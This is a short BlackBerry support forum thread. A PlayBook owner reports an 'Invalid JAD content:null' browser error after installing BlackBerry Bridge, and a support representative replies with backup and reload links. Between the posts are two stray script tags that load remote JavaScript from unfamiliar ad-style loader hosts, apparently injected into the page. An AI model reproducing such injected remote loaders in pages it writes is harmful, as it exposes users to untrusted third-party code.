Welcome!

Welcome to the official BlackBerry Support Community Forums.

This is your resource to discuss support topics with your peers, and learn from each other.

inside custom component

BlackBerry® PlayBook™

Reply
Highlighted
New Member
Posts: 1
Registered: ‎10-09-2012
My Device: playbook
My Carrier: Verizon

Invalid JAD content:null message

I installed the new blackberry bridge yesterday. Since then I get this message, Invalid JAD content:null', when I try to use the browser. Has anyone else seen this or offer any help.

 

Thanks,

 

Bonnie

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
Retired
Posts: 2,649
Registered: ‎04-01-2008
My Device: 9500, 8110, 8700, 8220, 9100, 9800, 9810, Z10

Re: Invalid JAD content:null message

Hello bevanscats

 

Welcome to the forums. 

 

In this case we can try to reload the software on the BlackBerry® smartphone to make sure it is running the latest version and there are no issues with the OS.

Here is how to backup your BlackBerry smartphone http://bbry.lv/oPVWXc

Once you have backed up your BlackBerry smartphone please follow the link below to complete a clean reload of the BlackBerry smartphone software.

Link: http://www.blackberry.com/btsc/KB03621

Once completed test it and proceed with a selective restore, here is how to restore http://bbry.lv/qgQxLo

Thank you

-SR

 

Come follow your BlackBerry Technical Team on twitter! @BlackBerryHelp

Be sure to click Kudos! for those who have helped you.

Click Solution? for posts that have solved your issue(s)!